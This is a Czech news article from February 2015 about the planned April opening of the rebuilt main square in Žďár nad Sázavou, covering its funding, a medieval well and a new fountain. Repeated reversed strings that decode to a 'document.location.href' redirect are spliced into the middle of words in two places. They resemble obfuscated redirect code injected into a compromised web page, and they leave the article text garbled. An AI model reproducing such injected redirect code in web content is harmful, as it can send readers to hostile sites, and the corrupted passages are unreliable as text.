Rainbow page separator

Opravené náměstí bude slavnostně otevřeno v dubnu

Čtvrtek, 19. února 2015

Náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Na 18. dubna je stanoveno slavnostní otevření zrekonstruovaného žďárského náměstí Republiky. To bylo s několikaměsíčním předstihem uvedeno do provozu krátce před loňskými Vánoci.
„Doufáme, že klimatické podmínky budou v té době už na[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolik příznivé, aby mohl být zahájen provoz nové kašny včetně světelného režimu,“ informoval starosta Žďáru nad Sázavou Zdeněk Navrátil.
Rekonstrukce žďárského náměstí Republiky za pětadvacet milionů korun se sedmdesátiprocentním přispěním evropské dotace byla zahájena loni na jaře. V jejím rámci byl rovněž proveden archeologický výzkum, na jehož základě byla na parkovišti v horní části náměstí zachráněna středověká studna ze 14. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí. Střed města se dočkal nové zeleně, mobiliáře, hodin, časové osy s nejdůležitějšími mezníky v dějinách města a také kašny z mrákotínské žuly. V rámci přestavby byla rovněž na zeď Staré radnice umístěna zvonkohra a po dlouhých letech ze žďárského náměstí zmizela ruina bývalého hotelu Bílý lev.